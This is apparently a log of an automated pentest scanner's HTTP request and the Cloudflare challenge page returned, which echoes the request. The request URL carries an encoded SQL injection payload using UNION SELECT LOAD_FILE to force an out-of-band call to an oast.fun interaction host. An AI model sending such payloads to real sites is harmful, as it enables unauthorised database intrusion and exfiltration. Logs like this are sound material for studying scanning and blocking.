REQUEST:
GET https://my.myfirst.tech/search?category=%27%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%2C%27%5C%5Ca%27%29%29--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9763
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8476fde3aa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=WCSgtlIIfXrQNzHAaJ9GlEY%2BAZXI6ClIOWWWBcH2E9oTM4BMi5sq4MpEhjDJOKSwY8UIij%2FNVYWK5EYGdnsd55rOkepW1JmCuJprGRxeO8HRfu004WgqVcb%2FnGnLt9rBHw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8476fde3aa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'nttNRN70hI3RPAWbCpTzJJtt1Lgrnljb41quGAWUaHU-1784281162-1.2.1.1-0LQLIYoLmyc4B.76zSo0f8XGAZUUaO2HC0LPA34aPA40BLaA1P.i6H7LF_3qjr7h',cITimeS: '1784281162',cRay: 'a1c8476fde3aa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?category=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_tk=ebGeB1xKMUdgZ9eChIWdJ__aeLDU7W72FfM393nbhp4-1784281162-1.0.1.1-7qNFJtT6dIiuIkIrn3sTxQO55QBnv_qGPlSGn7ZNdaE",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?category=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_f_tk=ebGeB1xKMUdgZ9eChIWdJ__aeLDU7W72FfM393nbhp4-1784281162-1.0.1.1-7qNFJtT6dIiuIkIrn3sTxQO55QBnv_qGPlSGn7ZNdaE",md: 'P593kQyBM5710YggJlR0mgBLOWiiwAJC4DTp3mIRg9A-1784281162-1.2.1.1-tJQ.Ad_Kz89laPJgoOylH2mkL_p14p4FAfIt0y2fbIH9SqEzsSHlRg9vXRsk2stR77ZB8tXdeQWHH9NhTT7IZFPv7xzFSiv8viNzPcKp5.x0eMZBl0phjplEvEbF4Wkcp3VOUvxmB43_XWrNTgZVoo2XzaQ5GarWVCOQgo7aDOOVjdjQV6EikQpayf32pzfUO9d9mUZwYt.Qu0HF36QkacsaEb9JVvTQ1yOo7m4qdjy2G9Z_0jY57dTHHhhXo8MMoao9XJKwXKka2n1WDgdeZLaZ2SbpfrQANPsM8Mbr.9bGgStFsVhmNQnnmiH7hHU677urmEka4gL0mNvft5HxZXCARPotec141BzNSRdbBuYY40EkCGQO4yKNCJ.xtJM3DlGr25cBA9DWQ1rzv59DbOdzaVBeGMvia6JbBPBgsh.NP4tN5oW_Fr9Ae4HmVWY7hF3FC5F1Dh.Wtv00eTyMg.4qepcbgQnzNyyXTdxasMKLOJaaFVuKDyGOlY2z5jxaMpuN83UgRh4bdUptJINu7HyMeYkBRSn2LMsgf6IdzOZAnT65MOK7QqJWHgTf6WMReeyO3Z_pIjYdxQACKhtVtLXF6eQHDeY2TiXXeey2H8duiGI56i3.O53WOp8_xBETFMJgyFr8IhFsOPOBZEHiUygpTwZiY1c.qA5U9Y.5xY2cL5lsI8gmxe2pGIuzuo04FWCdo9AlJINFu9isF.4XaXsQxGFK_NjXSFhG9DQw7JomegvTfLA6r73sqNCxSg3Ja2W4NE598.mJb4zNYwmJr_ORS1dDTiKcoevQMxOVkhAc1yRobIJYHYdDe6lnLejYZc9Mov0FXl1PsHkeCKVzvJVD70_4fk14e1WI5DX4v2vf1M1V9.4l3UtWZM74omHJhtmPXKbxWB052KwEvVX9_6uKBdol4zeyNPxg4qUfyrJDOdm64FaPLfF_Ed.l.rzPNz6pEt.Smrn.uR7VFy7A0lYiCYci1Qb47HQJJdnECkapAkjA8HqZpIpz0lcJHxrRTvNe_cgxIfR0JpOYpnCv7hXwNsJju8BGTiKUYl.pdb6J7o8na8n37hHO7OIHai9fFMiQUocqb4AMtvbdaltzynY_9g4vcuwM0PfTS17nW8OjexatlgdvdMTUw99GxpSC.XfkWH3t3VUcj3WDINpRwz4.l0kZpw.7jOeT33NGHx1gAjDAA.LXIRT.Gnx8T8o3ZpdBrBfC9CGn9R7qyHxlO3Pw2KtPEyfFVs3.Mg2ZQnUoBT0bmDQ7WjI6LK4PrO0EO2WhcezdjM15aAKxTM75cQ',mdrd: 'GITh6T.XeJg6E.5VuvlWm2w6K81oRmyR8C4aLuxLGKg-1784281162-1.2.1.1-sW9VbQoQNUK_IIkoSTChc2Xw08R.6WuIHTs7N5PT8kpQ1_PnQ1que6crtEnKsRve8SvtRsNhXqqhyUBMBDN5Co_WON5WsXrBH9DJ9k2ZzVXIZyMSMFRltfMF4OwW97qH6EV2x3VWgLhoA9Oj1KmfgdMB5jI74Q.Qq7kWN0Sah5WiTkTxbqYbTdPIwF2Ywb3LMygDUUjAb5gwuELCaejOl7FpFcF5JbjDy5N3SuttHQ.1LA2gMMnWXHh44Jt93vYD',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8476fde3aa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?category=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_rt_tk=ebGeB1xKMUdgZ9eChIWdJ__aeLDU7W72FfM393nbhp4-1784281162-1.0.1.1-7qNFJtT6dIiuIkIrn3sTxQO55QBnv_qGPlSGn7ZNdaE"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
